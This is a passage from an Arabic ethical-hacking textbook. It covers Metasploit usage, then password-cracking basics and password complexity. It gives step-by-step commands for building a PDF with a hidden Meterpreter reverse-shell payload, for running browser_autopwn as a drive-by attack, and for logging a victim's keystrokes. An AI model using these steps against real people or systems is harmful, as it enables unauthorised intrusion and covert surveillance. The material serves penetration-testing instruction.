‫ﻟﻌرض ﻗﺎﺋﻣﺔ ﻣن اﻟﺧﯾﺎرات اﻟﻣﺗﺎﺣﺔ ﻟﮭذا ‪ ،exploit‬ﻓﻧﺣن ﻧﺳﺗﺧدم اﻟوﺿﻊ ‪ .O‬اﻟﺧﯾﺎرات ھﻲ وﺳﯾﻠﺔ ﻟﺗﻛوﯾن وﺣدة ‪ .exploit‬ﻛل‬ ‫‪-‬‬
‫‪ exploit‬وﺣدة ﻟدﯾﮭﺎ ﻣﺟﻣوﻋﺔ ﻣﺧﺗﻠﻔﺔ ﻣن اﻟﺧﯾﺎرات )أو ﻻ ﺷﻲء ﻋﻠﻰ اﻹطﻼق(‪ .‬ﯾﺟب أن ﯾﺗم ﺗﻌﯾﯾن ﺟﻣﯾﻊ اﻟﺧﯾﺎرات اﻟﻣطﻠوﺑﺔ ﻗﺑل‬
‫أن ﯾﺗم اﻟﺳﻣﺎح ﻟﺗﻧﻔﯾذ ‪ .exploit‬ﻣن اﻟﺻورة اﻟﺗﺎﻟﯾﺔ‪ ،‬ﺳﺗﻼﺣظ أن اﻟﻌدﯾد ﻣن اﻟﺧﯾﺎرات اﻟﻣطﻠوﺑﺔ ﯾﺗم ﺗﻌﯾﯾﻧﮭﺎ ﺑﺷﻛل اﻓﺗراﺿﻲ‪ .‬إذا ﻛﺎن‬
‫ھذا ھو اﻟﺣﺎل‪ ،‬ﻟم ﯾﻛن ﻟدﯾك ﻟﺗﺣدﯾث ﻗﯾﻣﺔ اﻟﺧﯾﺎرات إﻻ إذا ﻛﻧت ﺗرﯾد ﺗﻐﯾﯾره‪.‬‬
‫‪#msfcli auxiliary/scanner/portscan/xmas O‬‬
‫ﻟﺗﻧﻔﯾذ ‪ exploit‬ﻟدﯾﻧﺎ‪ ،‬ﻓﻧﺣن ﻧﺳﺗﺧدم اﻟوﺿﻊ ‪:E‬‬ ‫‪-‬‬
‫‪#msfcli auxiliary/scanner/portscan/xmas E‬‬

‫‪METASPLOITABLE MYSQL‬‬

‫ﻓﻲ ھذه اﻟﺟزء‪ ،‬ﺳوف ﻧﺳﺗﻛﺷف ﻛﯾﻔﯾﺔ اﺳﺗﺧدام ‪ Metasploit‬ﻟﻣﮭﺎﺟﻣﺔ ﺧﺎدم ﻗﺎﻋدة اﻟﺑﯾﺎﻧﺎت ‪ MYSQL‬ﺑﺎﺳﺗﺧدام وﺣدة ﻓﺣص ‪.MYSQL‬‬
‫ﻛوﻧﮭﺎ ﻗﺎﻋدة اﻟﺑﯾﺎﻧﺎت اﻟﻣﻔﺿﻠﺔ ﻟﻠﻛﺛﯾر ﻣن اﻟﻣﻧﺎﺑر ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت‪ ،‬ﺑﻣﺎ ﻓﻲ ذﻟك ‪ Drupal‬و‪ ،WordPress‬واﻟﻌدﯾد ﻣن اﻟﻣواﻗﻊ ﺗﺳﺗﺧدم‬
‫ﺣﺎﻟﯾﺎ ﺧﺎدم ﻗﺎﻋدة اﻟﺑﯾﺎﻧﺎت ‪ .MYSQL‬ھذا ﯾﺟﻌﻠﮭﺎ ھدﻓﺎ ﺳﮭﻼ ﻟﮭﺟوم ‪.Metasploitable MYSQL‬‬
‫‪ -1‬ﻛﻣﺎ ﺗﻌﻠﻣﻧﺎ ﺳﺎﺑﻘﺎ ﻓﻲ اﺳﺎﺳﯾﺎت ﺗﺷﻐﯾل ‪ metasploit‬ﻧﻘوم ﺑﺗﺷﻐﯾل ﻋن طرﯾﻖ ﻛﺗﺎﺑﺔ اﻻﻣر ‪ msfconsole‬ﻓﻲ اﻟﺗرﻣﻧﺎل واﻟﺗﻲ ﺗؤدى‬
‫اﻟﻰ ﺗوﺟﯾﮭك اﻟﻰ اﻟﺗطﺑﯾﻖ ‪.metasploit‬‬
‫‪ -2‬ﻧﻘوم ﺑﺎﻟﺑﺣث ﻋن ﺟﻣﯾﻊ اﻟوﺣدات اﻟﻣرﺗﺑطﺔ ب ‪ MYSQL‬وذﻟك ﺑﺎﺳﺗﺧدام اﻻﻣر ‪.search mysql‬‬
‫‪ -3‬ﻧﻘوم ﺑﺎﺳﺗﺧدام وﺣدة ﻓﺣص ‪ MYSQL‬ﻛﺎﻻﺗﻰ‪:‬‬

‫‪ -4‬ﻧﻘوم ﺑﻌرض اﻟﻣﺗطﻠﺑﺎت اﻟﻣﺗﺎﺣﺔ ﻟﻛﻲ ﺗﻌﻣل ﺑﺎﺳﺗﺧدام اﻻﻣر ‪.show options‬‬
‫‪ -5‬ﻧﻘوم ﺑﺈﻋداد ھذه اﻟﻣﺗطﻠﺑﺎت ﺛم ﺷن اﻟﮭﺟوم ﺑﺎﺳﺗﺧدام اﻻﻣر ‪.exploit‬‬

‫‪METASPLOITABLE PDF‬‬

‫ﻓﻲ ھذه اﻟﺟزء‪ ،‬ﺳوف ﻧﺳﺗﻛﺷف ﻛﯾﻔﯾﺔ اﺳﺗﺧدام ‪ Metasploit‬ﻟﺗﻧﻔﯾذ ھﺟوم ﺑﺎﺳﺗﺧدام ﺗﻧﺳﯾﻖ اﻟﻣﺳﺗﻧدات اﻟﻣﺣﻣوﻟﺔ )‪ .(PDF‬ﻣﻠف ‪Adobe‬‬
‫‪ PDF‬ھو ﻣﻌﯾﺎر ﯾﺳﺗﺧدم ﻟﻠﻐﺎﯾﺔ ﻟﻧﻘل ﻣﺳﺗﻧد إﻟﻰ طرف آﺧر‪ .‬ﻧظرا ﻻﺳﺗﺧداﻣﮭﺎ ﻋﻠﻰ ﻧطﺎق واﺳﻊ‪ ،‬وﺧﺻوﺻﺎ ﺑﺳﺑب اﺳﺗﺧدام أﻋﻣﺎﻟﮭﺎ‪ ،‬ﺳﻧﮭﺎﺟم‬
‫ﺟﮭﺎز اﻟﻣﺳﺗﺧدم ﻣن ﺧﻼل اﻟﺳﻣﺎح ﻟﮭم ﺑﺎن ﯾﻌﺗﻘدوا أﻧﮭم ﯾﻘوﻣون ﺑﻔﺗﺢ ﻣﺳﺗﻧد ‪.PDF‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪311‬‬

‫‪ -1‬ﻧﻔﺗﺢ اﻟﺗرﻣﻧﺎل‬
‫‪ -2‬ﻧﻘوم ﺑﺗﺷﻐﯾل ‪ metasploit‬ﻋن طرﯾﻖ ﻛﺗﺎﺑﺔ اﻻﻣر ‪ msfconsole‬ﻓﻲ اﻟﺗرﻣﻧﺎل‪.‬‬
‫‪ -3‬ﻧﻘو ﺑﺎﻟﺑﺣث ﻋن ﺛﻐرات ‪ pdf‬ﻋن طرﯾﻖ اﺻدار اﻻﻣر ‪.search pdf‬‬
‫‪ -4‬اﺳﺗﺧدام أدوﺑﻲ ‪ PDF‬ﺟزءا ﻻ ﯾﺗﺟزأ ﻣن ‪:EXE Social engineering‬‬
‫‪use exploit/windows/fileformat/adobe_pdf_embedded_exe‬‬
‫‪ -5‬ﺛم ﻧﻘوم ﺑﺎﺳﺗﺧدام اﻻﻣر ‪ show options‬ﻟﻌرض اﻟﻣﺗطﻠﺑﺎت ﻟﺗﺷﻐﯾل ‪ exploit‬ھذا‪.‬‬
‫‪ -6‬ﻧﻼﺣظ ﻣن اﻟﻣﺗطﻠﺑﺎت اﻧﮫ ﯾﺣﺗﺎج وﺿﻊ ﻛل ﻣن ‪ FILENAME‬و‪.INFILENAME‬‬
‫‪ -7‬ﺣﯾث ﯾﻌﺑر ‪ FILENAME‬ﻋن ﻣﻠف ‪ PDF‬اﻟذي ﺗرﯾد اﻧﺷﺎﺋﮫ‪.‬‬
‫‪ -8‬وﯾﻌﺑر ‪ INFILENAME‬ﻋن ﻣوﻗﻊ ﻣﻠف ‪) PDF‬اﻟﻐﯾر ﻣﺻﺎب( اﻟﺗﻲ ﻟدﯾك وﺻول اﻟﯾﮫ ﻟﻼﺳﺗﺧدام‪.‬‬
‫‪set FILENAME evildocument.pdf‬‬
‫‪set INFILENAME /root/Desktop/willie.pdf‬‬
‫‪ -9‬ﺛم ﻧﻘوم ﺑﺗﺷﻐﯾل ‪ EXPLIOT‬ﻋن طرﯾﻖ اﺻدار اﻻﻣر ‪.exploit‬‬
‫ﻓﻲ ھذه اﻟﺟزء‪ ،‬اﺳﺗﺧدﻣﻧﺎ ‪MSFCONSOLE‬ﻹرﺳﺎل ‪ exploit‬وإﻧﺷﺎء ﻣﻠف ‪ PDF‬أدوﺑﻲ ﺗﺣﺗوي ﻋﻠﻰ ‪ Meterpreter‬ﻣﺳﺗﺗر‪ .‬ﺑدأﻧﺎ‬
‫ﻣن ﺧﻼل إطﻼق وﺣدة اﻟﺗﺣﻛم واﻟﺑﺣث ﻋن ﻧﻘﺎط اﻟﺿﻌف ﻓﻲ ‪ PDF‬اﻟﻣﻌروﻓﺔ‪ .‬ﺑﻌد اﺧﺗﯾﺎر ‪ EXE PDF‬ﺟزءا ﻻ ﯾﺗﺟزأ ﻣن ‪ ،exploit‬واﻟذي‬
‫ﯾﺳﻣﺢ ﻟﻧﺎ ﻹﺧﻔﺎء ﺑرﻧﺎﻣﺞ ﻣﺳﺗﺗر ﻓﻲ ﻣﺷروع ‪ ،PDF‬وﺿﻌﻧﺎ ﺧﯾﺎراﺗﻧﺎ ﺛم ﻗﻣﻧﺎ ﺑﺗﻧﻔﯾذ ‪ Metasploit .exploit‬ﺳوف ﯾﻧﺷﺎ ‪ PDF‬ﯾراﻓﻘﮫ‬
‫‪ payloads‬ﻣن اﻟﻧوع ‪ .Windows Reverse TCP‬ﻋﻧدﻣﺎ ﯾﻔﺗﺢ اﻟﮭدف ﻣﻠف ‪ ،PDF‬ﻓﺎن ‪ Meterpreter‬ﺳوف ﯾﻌﻣل وﯾﻘوم ﺑﻔﺗﺢ ﻗﺎﻧﺔ‬
‫اﺗﺻﺎل ﺑﯾﻧك وﺑﯾن اﻟﮭدف‪.‬‬

‫‪IMPLEMENTING BROWSER_AUTOPWN‬‬

‫‪ BROWSER_AUTOPWN‬ھﻲ وﺣدة اﻟﻣﺳﺎﻋدة )‪ (auxiliary module‬اﻟﺗﻲ ﺗﻘدﻣﮭﺎ ‪ Metasploit‬اﻟﺗﻲ ﺗﺳﻣﺢ ﻟك ﺑﺎﻟﮭﺟوم ﻋﻠﻰ‬
‫ﺟﮭﺎز اﻟﺿﺣﯾﺔ ﺑطرﯾﻘﮫ اﻟﯾﮫ ﺑﺑﺳﺎطﺔ ﻋﻧد ﻓﺗﺢ ﺻﻔﺣﺔ اﻟوﯾب‪ BROWSER_AUTOPWN .‬ﯾﻧﻔذ ﻋﻣﻠﯾﺔ اﻻﺳﺗطﻼع ﻋﻠﻰ اﻟﻌﻣﯾل ﻗﺑل أن‬
‫ﯾﮭﺎﺟم؛ وھذا ﯾﻌﻧﻲ أﻧﮫ ﻟن ﯾﺣﺎول اﺧﺗراق ﻣوزﯾﻼ ﻓﺎﯾرﻓوﻛس ﺿد ﻣﺗﺻﻔﺢ إﻧﺗرﻧت إﻛﺳﺑﻠورر ‪ .7‬اﺳﺗﻧﺎدا إﻟﻰ ﺗﺻﻣﯾم اﻟﻣﺗﺻﻔﺢ‪ ،‬ﻓﺈﻧﮫ ﯾﻘرر ﻣﺎ ھو‬
‫أﻓﺿل ‪ exploit‬ﻟﻠﻧﺷر‪.‬‬

‫‪ -1‬ﻧﻔﺗﺢ اﻟﺗرﻣﻧﺎل‬
‫‪ -2‬ﻧﻘوم ﺑﺗﺷﻐﯾل ‪ metasploit‬ﻋن طرﯾﻖ ﻛﺗﺎﺑﺔ اﻻﻣر ‪ msfconsole‬ﻓﻲ اﻟﺗرﻣﻧﺎل‪.‬‬
‫‪ -3‬ﻧﻘو ﺑﺎﻟﺑﺣث ﻋن ﺛﻐرات ﻋن طرﯾﻖ اﺻدار اﻻﻣر ‪.search autopwn‬‬
‫‪ -4‬اﺳﺗﺧدام اﻟوﺣدة ‪:BROWSER_AUTOPWN‬‬
‫‪use auxiliary/server/browser_autopwn‬‬
‫‪ -5‬ﻧﻘوم ﺑﺗﺛﺑﯾت ‪ PAYLOAD‬ﻓﻲ ھذه اﻟﺣﺎﻟﺔ ﻧﺧﺗﺎر ‪.Windows Reverse TCP‬‬
‫‪set payload windows/meterpreter/reverse_tcp‬‬
‫‪ -6‬ﺛم ﻧﻘوم ﺑﺎﺳﺗﺧدام اﻻﻣر ‪ show options‬ﻟﻌرض اﻟﻣﺗطﻠﺑﺎت ﻟﺗﺷﻐﯾل ‪ exploit‬ھذا‪.‬‬
‫‪ -7‬ﻧﻼﺣظ ﻣن اﻟﻣﺗطﻠﺑﺎت اﻧﮫ ﯾﺣﺗﺎج وﺿﻊ ﻛل ﻣن ‪LHOST‬و‪. URIPATH‬‬
‫‪ -8‬ﺣﯾث ﯾﻌﺑر ‪LHOST‬ﻋن ﻋﻧوان ‪ IP‬ﻟﻠﻣﺿﯾف اﻟﮭدف اﻟذي ﺳوف ﯾﺗم إﺟراء اﻻﺗﺻﺎل اﻟﻌﻛﺳﻲ‪.‬‬
‫‪set LHOST 192.168.10.109‬‬
‫"‪set URIPATH "filetypes‬‬
‫‪ -9‬ﺛم ﻧﻘوم ﺑﺗﺷﻐﯾل ‪ EXPLIOT‬ﻋن طرﯾﻖ اﺻدار اﻻﻣر ‪.exploit‬‬
‫‪ Metasploit -10‬ﯾﺑدأ ‪ exploit‬ﻋﻠﻰ اﻟﻌﻧوان ‪ IP‬اﻹﻟﻛﺗروﻧﻲ ‪http://[Provided IP Address]:8080‬‬
‫‪ -11‬ﻋﻧدﻣﺎ ﯾزور اﻟزاﺋر ﻋﻧوان‪ ،‬ﻓﺎن اﻟوﺣدة ‪ browser_autopwn‬ﺗﺣﺎول اﻻﺗﺻﺎل ﺑﺟﮭﺎز اﻟﻣﺳﺗﺧدم ﻹﻧﺷﺎء ‪ session‬ﺑﻌﯾدة‪ .‬ﻓﻲ ﺣﺎل‬
‫ﻧﺟﺎﺣﮭﺎ‪ ،‬ﻓﺎن ‪ Meterpreter‬ﺗواﻓﻖ ﻋﻠﻰ ھذا اﻻﺗﺻﺎل‪ .‬ﻟﺗﻧﺷﯾط ‪ ،session‬اﺳﺗﺧدم اﻷﻣر اﻟﺗﺎﻟﻲ‪:‬‬
‫‪sessions –I 1‬‬
‫‪ -12‬ﻟرؤﯾﺔ ﻣﻌظم أواﻣر ‪ Meterpreter‬ﯾﻣﻛن اﺻدار اﻻﻣر ‪.help‬‬
‫‪ -13‬ھﻧﺎك ﻗﺎﺋﻣﺔ ﻣن اﻷواﻣر اﻟﻣﺗوﻓرة‪ .‬ﻓﻲ ھذه اﻟﺣﺎﻟﺔ‪ ،‬ﺳوف ﻧﺑدأ ﻓﺣص اﻟﻣﻔﺎﺗﯾﺢ‪:‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪312‬‬

‫‪keyscan_start‬‬
‫‪ -14‬ﻟﻠﺣﺻول ﻋﻠﻰ ‪ keystrokes‬اﻟﺗﻲ ﺗم اﺗﺧﺎذھﺎ ﻣن وﺟﮭﺔ ﻧظرن اﻟﺿﺣﯾﺔ‪ ،‬ﻓﻧﺣن ﺑﺻدد إﺻدار اﻷﻣر ‪.keyscan_dump‬‬
‫ﻓﻲ ھذه اﻟﺟزء‪ ،‬اﺳﺗﺧدﻣﻧﺎ ‪MSFCONSOLE‬ﻹطﻼق ‪ .exploit browser_autopwn‬ﺑدأﻧﺎ ﻣن ﺧﻼل إطﻼق وﺣدة اﻟﺗﺣﻛم واﻟﺑﺣث‬
‫ﻋن ﺟﻣﯾﻊ وﺣدات ‪ autopwn‬اﻟﻣﻌروﻓﺔ‪ .‬ﺑﻌد اﺧﺗﯾﺎر وﺣدة ‪ ،autopwn‬وﺿﻌﻧﺎ ‪ payload‬ﻣن اﻟﻧوع ‪windows_reverse_tcp‬؛ واﻟذي‬
‫ﯾﺳﻣﺢ ﻟﻧﺎ ﻟﻠﺣﺻول ﻋﻠﻰ اﺗﺻﺎل ﻣرة أﺧرى ﻟﻧﺎ إذا ﻛﺎن اﻻﺧﺗراق ﻧﺎﺟﺢ‪ .‬ﺑﻣﺟرد زﯾﺎرة اﻟﺿﺣﯾﺔ اﻟﻣوﻗﻊ‪ ،‬ﻓﻧﺣن ﺳوف ﻧﺣﺻل ﻋﻠﻰ ‪ session‬ﻠﻠ‬
‫‪ Meterpreter‬ﻧﺷطﺔ‪.‬‬
‫ھﻧﺎ ﻧﻛون اﻧﺗﮭﯾﻧﺎ ﻣن اﻟﺟزء اﻟﺧﺎص ﺑﺎﻠ ‪ metasploit‬وﻟﻛﻧﮫ ﻟﯾس ﻛل ﺷﻲء ﺣﯾث ﺳوف ﻧﻔرد ﻟﮭذا اﻟﺟزء ﻛﺗﺎب ﺧﺎص ﺑﮫ ﻻﺣﻘﺎ وذﻟك‬
‫ﻷھﻣﯾﺗﮫ‪.‬‬

‫‪CRACKING PASSWORDS 5.3‬‬

‫ﻻ ﯾﻣﻛن أن ﯾﺗﺣﻘﻖ اﻻﺧﺗراق ﻣرة واﺣده‪ .‬ﯾﺗم إﻧﺟﺎز ذﻟك ﻣن ﺧﻼل اﻟﺧطوات اﻟﻣﺧﺗﻠﻔﺔ اﻟﺗﻲ ﺗﺷﻣل ﻛﺳر ﻛﻠﻣﺎت اﻟﺳر]‪، [cracking password‬‬
‫واﻻﻣﺗﯾﺎزات اﻟﻣﺗﺻﺎﻋد]‪ ، [escalating privileges‬واﻟﺗطﺑﯾﻘﺎت اﻟﻣﻧﻔذة]‪ ، [executing applications‬أﺧﻔﺎء اﻟﻣﻠﻔﺎت]‪، [hiding files‬‬
‫وﺗﻐطﯾﺔ اﻟﻣﺳﺎرات ]‪ ،[covering tracks‬وأﺧﯾرا اﺧﺗﺑﺎر اﻻﺧﺗراق‪ .‬اﻵن ﺣﺎن اﻟوﻗت ﻟﻣﻧﺎﻗﺷﺔ ھذه اﻟﺧطوات واﺣدة ﺗﻠو اﻷﺧرى ﺑدﻗﺔ‪ ،‬ﻟﺗﺣدﯾد‬
‫ﻛﯾﻔﯾﺔ اﺧﺗراق اﻟﻣﮭﺎﺟم اﻟﻧظﺎم‪ .‬ﻓﻲ ﻣﺣﺎوﻟﺔ اﺧﺗراق اﻟﻧظﺎم‪ ،‬ﯾﺣﺎول اﻟﻣﮭﺎﺟم اوﻻ ﻛﺳر ﻛﻠﻣﺎت اﻟﺳر‪.‬‬
‫أﻧﮫ ﻣن اﻟﺻﻌب أن ﻧﺗﺻور ﻣﻧﺎﻗﺷﺔ ﻣوﺿوع ﻣﺛل أﺳﺎﺳﯾﺎت اﻟﻘرﺻﻧﺔ دون ﻣﻧﺎﻗﺷﺔ ﻛﻠﻣﺎت اﻟﺳر وﻛﺳر ﻛﻠﻣﺔ اﻟﺳر‪ .‬ﺑﻐض اﻟﻧظر ﻋﻣﺎ ﻧﻔﻌﻠﮫ أو‬
‫ﻣدى ﺗﻘدﻣﻧﺎ‪ ،‬ﯾﺑدو أن ﻛﻠﻣﺎت اﻟﺳر ﺗظل أﻛﺛر اﻟطرق ﺷﻌﺑﯾﺔ ﻟﺣﻣﺎﯾﺔ اﻟﺑﯾﺎﻧﺎت واﻟﺳﻣﺎح ﺑﺎﻟوﺻول إﻟﻰ اﻟﻧظم‪ .‬ﻣﻊ ھذا ﻓﻲ اﻻﻋﺗﺑﺎر‪ ،‬دﻋوﻧﺎ ﻧﻠﻘﻲ‬
‫اﻟﺗﻔﺎف ﻗﺻﯾر ﻟﺗﻐطﯾﺔ أﺳﺎﺳﯾﺎت ﻛﺳر ﻛﻠﻣﺔ اﻟﺳر‪.‬‬
‫ھﻧﺎك ﻋدة أﺳﺑﺎب ﻟﻣﺎذا ﻣﺧﺗﺑر اﻻﺧﺗراق ﺳوف ﺗﻛون ﻣﮭﺗﻣﺔ ھﻲ ﻛﺳر ﻛﻠﻣﺎت اﻟﺳر‪ .‬أوﻻ وﻗﺑل ﻛل ﺷﻲء‪ ،‬ھذا ھو أﺳﻠوب ﻋظﯾم ﻟرﻓﻊ وﺗﺻﻌﯾد‬
‫اﻻﻣﺗﯾﺎزات‪ .‬اﻟﻧظر ﻓﻲ اﻟﻣﺛﺎل اﻟﺗﺎﻟﻲ‪ :‬ﻧﻔﺗرض أن ﻛﻧت ﻗﺎدرا ﻋﻠﻰ ﺧرق اﻟﻧظﺎم اﻟﮭدف وﻟﻛن ﺑﻌد ﺗﺳﺟﯾل اﻟدﺧول‪ ،‬ﺗﻛﺗﺷف أن ﻟﯾس ﻟدﯾك أي‬
‫ﺣﻘوق ﻋﻠﻰ ھذا اﻟﻧظﺎم‪ .‬ﺑﻐض اﻟﻧظر ﻋﻣﺎ ﺗﻔﻌﻠﮫ‪ ،‬وﻛﻧت ﻏﯾر ﻗﺎدر ﻋﻠﻰ اﻟﻘراءة واﻟﻛﺗﺎﺑﺔ ﻓﻲ اﻟﻣﻠﻔﺎت واﻟﻣﺟﻠدات اﻟﮭدف وأﺳوأ ﻣن ذﻟك‪ ،‬ﻛﻧت‬
‫ﻏﯾر ﻗﺎدر ﻋﻠﻰ ﺗﺛﺑﯾت أي ﺑرﻧﺎﻣﺞ ﺟدﯾد‪ .‬ھذا ھو اﻟﺣﺎل ﻏﺎﻟﺑﺎ ﻋﻧد اﻟﺣﺻول ﻋﻠﻰ ﺣﺳﺎب ﻟدﯾﮭﺎ اﻣﺗﯾﺎزات ﻗﻠﯾﻠﮫ ﯾﻧﺗﻣون إﻟﻰ ﻣﺟﻣوﻋﺎت ]‪ [user‬او‬
‫]‪.[guest‬‬
‫إذا ﻛﺎن اﻟﺣﺳﺎب اﻟذي ﻟدﯾﮫ اﻟوﺻول إﻟﻰ ﻋدد ﻗﻠﯾل أو ﻟﯾس ﻟدﯾﮫ أي ﺣﻘوق‪ ،‬ﻓﻠن ﺗﻛون ﻗﺎدرة ﻋﻠﻰ ﺗﻧﻔﯾذ اﻟﻌدﯾد ﻣن اﻟﺧطوات اﻟﻣطﻠوﺑﺔ ﻟﻣزﯾد ﻣن‬
‫ﺗﻧﺎزﻻت اﻟﻧظﺎم‪ .‬إذا ﻓﻛﺳر ﻛﻠﻣﺔ اﻟﻣرور ھو ﺑﺎﻟﺗﺄﻛﯾد وﺳﯾﻠﺔ ﻣﻔﯾدة ﻟﺗﺻﻌﯾد اﻻﻣﺗﯾﺎزات وﯾﺳﻣﺢ ﻟﻧﺎ ﻟﻠﺣﺻول ﻋﻠﻰ ﺣﻘوق إدارﯾﺔ ﻋﻠﻰ اﻟﺟﮭﺎز‬
‫اﻟﻣﺳﺗﮭدف ﻓﻲ ﻛﺛﯾر ﻣن اﻷﺣﯾﺎن‪.‬‬
‫ﺳﺑب آﺧر ﻟﻛﺳر ﻛﻠﻣﺎت اﻟﺳر وﺗﺻﺎﻋد اﻻﻣﺗﯾﺎزات ھو أن اﻟﻌدﯾد ﻣن اﻷدوات اﻟﺗﻲ ﺗﻌﻣل ﻋﻠﻰ اﻟﻧﺣو اﺧﺗﺑﺎر اﻻﺧﺗراق ﺗﺗطﻠب اﻟوﺻول اﻟﻰ‬
‫ﻣﺳﺗوى اﻹدارة ﻣن أﺟل اﻟﺗﺛﺑﯾت واﻟﺗﻧﻔﯾذ ﺑﺷﻛل ﺻﺣﯾﺢ‪.‬‬

‫ﻣﺎ ھو ﻛﺳر ﻛﻠﻣﺎت اﻟﺳر )‪(CRACKING PASSWORD‬؟‬


‫‪ Password Cracking‬ھو ﻋﻣﻠﯾﺔ اﺳﺗﻌﺎدة ﻛﻠﻣﺎت اﻟﺳر ﻣن اﻟﺑﯾﺎﻧﺎت اﻟﺗﻲ ﺗم ﻧﻘﻠﮭﺎ ﻋن طرﯾﻖ ﻧظﺎم اﻟﻛﻣﺑﯾوﺗر أو اﻟﻣﺧزﻧﺔ ﻓﯾﮫ‪ .‬اﻟﻐرض ﻣن‬
‫‪ Password Cracking‬ﻗد ﺗﻛون ﻣﺳﺎﻋدة اﻟﻣﺳﺗﺧدم ﻻﺳﺗﻌﺎدة ﻛﻠﻣﺔ اﻟﺳر اﻟﺗﻲ ﻗد ﻧﺳﯾت أو ﻓﻘدت‪ ،‬ﻛﺈﺟراء وﻗﺎﺋﻲ ﻣن ﻗﺑل ﻣﺳؤوﻟﻲ اﻟﻧظﺎم‬
‫ﻟﻠﺗﺣﻘﻖ ﻣن ﻛﻠﻣﺎت اﻟﻣرور اﻟﻣﻛرﻛﮫ ﺑﺳﮭوﻟﺔ أو ﯾﻣﻛن أن ﺗﺳﺗﺧدم أﯾﺿﺎ ﻟﻠوﺻول اﻟﻐﯾر ﻣﺻرح ﺑﮫ إﻟﻰ اﻟﻧظﺎم‪.‬‬

‫اﻟﻌدﯾد ﻣن ﻣﺣﺎوﻻت اﻟﻘرﺻﻧﺔ ﺗﺑدأ ﻣﻊ ﻣﺣﺎوﻻت ﻛﺳر ﻛﻠﻣﺔ اﻟﺳر ‪ .Password Cracking‬ﻛﻠﻣﺎت اﻟﺳر ھﻲ ﻗطﻌﺔ رﺋﯾﺳﯾﺔ ﻟﻠﻣﻌﻠوﻣﺎت‬
‫اﻟﺿرورﯾﺔ ﻟﻠوﺻول إﻟﻰ اﻟﻧظﺎم‪ .‬وﺑﺎﻟﺗﺎﻟﻲ‪ ،‬ﻓﺈن ﻣﻌظم اﻟﻣﮭﺎﺟﻣﯾن ﯾﺳﺗﺧدﻣوا ﺗﻘﻧﯾﺎت ‪ Password Cracking‬ﻟﻠوﺻول اﻟﻐﯾر ﻣﺻرح ﺑﮫ إﻟﻰ‬
‫اﻟﻧظﺎم اﻟﺿﻌﯾف‪ .‬ﻗد ﺗﻛﺳر ﻛﻠﻣﺎت اﻟﺳر ﯾدوﯾﺎ أو ﺑﺎﺳﺗﺧدام أدوات ﻣﺛل ‪ dictionary‬أو أﺳﻠوب اﻟﻘوة اﻟﻐﺎﺷﻣﺔ‪.brute-force method‬‬
‫ﺑراﻣﺞ اﻟﻛﻣﺑﯾوﺗر اﻟﺗﻲ ﺗم ﺗﺻﻣﯾﻣﮭﺎ ﻟﻛﺳر ﻛﻠﻣﺎت اﻟﺳر ھﻲ وظﺎﺋف ﻟﻠﺗﺣﻘﻖ ﻣن ﻋدد ﻣن ﻛﻠﻣﺎت اﻟﺳر اﻟﻣﺣﺗﻣﻠﺔ ﻓﻲ اﻟﺛﺎﻧﯾﺔ اﻟواﺣدة ﻣﮭﺎ‪ .‬ﻓﻲ ﻛﺛﯾر‬
‫ﻣن اﻷﺣﯾﺎن ﻓﺎن ﻏﺎﻟﺑﯾﮫ اﻟﻣﺳﺗﺧدﻣﯾن‪ ،‬ﻋﻧد إﻧﺷﺎء ﻛﻠﻣﺎت ﻣرور‪ ،‬ﯾﺳﺗﺧدﻣوا ﻛﻠﻣﺎت اﻟﻣرور اﻟﺗﻲ ﻟدﯾﮭم اﺳﺗﻌداد ﻋﻠﻰ ﺗذﻛرھﺎ وﺗﻛون ﺳﮭﻠﺔ اﻟﺗوﻗﻊ‬
‫ﻣﺛل اﺳﺗﺧدام اﺳم ﺣﯾوان أﻟﯾف أو اﺧﺗﯾﺎر واﺣد ﺑﺳﯾط ﺣﺗﻰ ﯾﺗﻣﻛﻧوا ﻣن ﺗذﻛرھﺎ‪ .‬ﻣﻌظم ﺗﻘﻧﯾﺎت ﻛﺳﯾر ﻛﻠﻣﺎت اﻟﺳر ﻧﺎﺟﺣﺔ ﺑﺳﺑب ﻛﻠﻣﺎت ﻣرور‬
‫اﻟﺿﻌﯾﻔﺔ أو ﺗﺧﻣﯾﻧﮭﺎ ﺑﺳﮭوﻟﺔ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪313‬‬

‫ﺗﻌﻘﯾدات ﻛﻠﻣﺎت اﻟﺳر ‪PASSWORD COMPLEXITY‬‬

‫ﺗﻌﻘﯾد ﻛﻠﻣﺔ اﻟﻣرور )‪ (Password Complexity‬ﯾﻠﻌب دورا رﺋﯾﺳﯾﺎ ﻓﻲ ﺗﺣﺳﯾن اﻷﻣن ﺿد اﻟﮭﺟﻣﺎت‪ .‬ذﻟك ھو اﻟﻌﻧﺻر اﻟﮭﺎم اﻟذي ﯾﺟب‬
‫ﻋﻠﻰ اﻟﻣﺳﺗﺧدﻣﯾن ﺿﻣﺎﻧﮫ أﺛﻧﺎء إﻧﺷﺎء ﻛﻠﻣﺔ ﻣرور‪ .‬ﯾﺟب أﻻ ﺗﻛون ﻛﻠﻣﺔ اﻟﻣرور ﺑﺳﯾطﺔ ﺣﯾث ان ﻛﻠﻣﺎت اﻟﻣرور اﻟﺑﺳﯾط ﻋرﺿﺔ ﺑﺳﮭوﻟﮫ‬
‫ﻟﻠﮭﺟﻣﺎت‪ .‬ﯾﺟب أن ﺗﻛون ﻛﻠﻣﺎت اﻟﻣرور اﻟﺗﻲ اﺧﺗرﺗﮭﺎ داﺋﻣﺎ ﻣﻌﻘدة وطوﯾﻠﺔ‪ ،‬وﯾﺻﻌب ﺗذﻛرھﺎ‪ .‬ﻛﻠﻣﺔ اﻟﻣرور اﻟﺗﻲ ﺗﻘوم ﺑﺈﻋدادھﺎ ﻟﺣﺳﺎﺑك ﯾﺟب‬
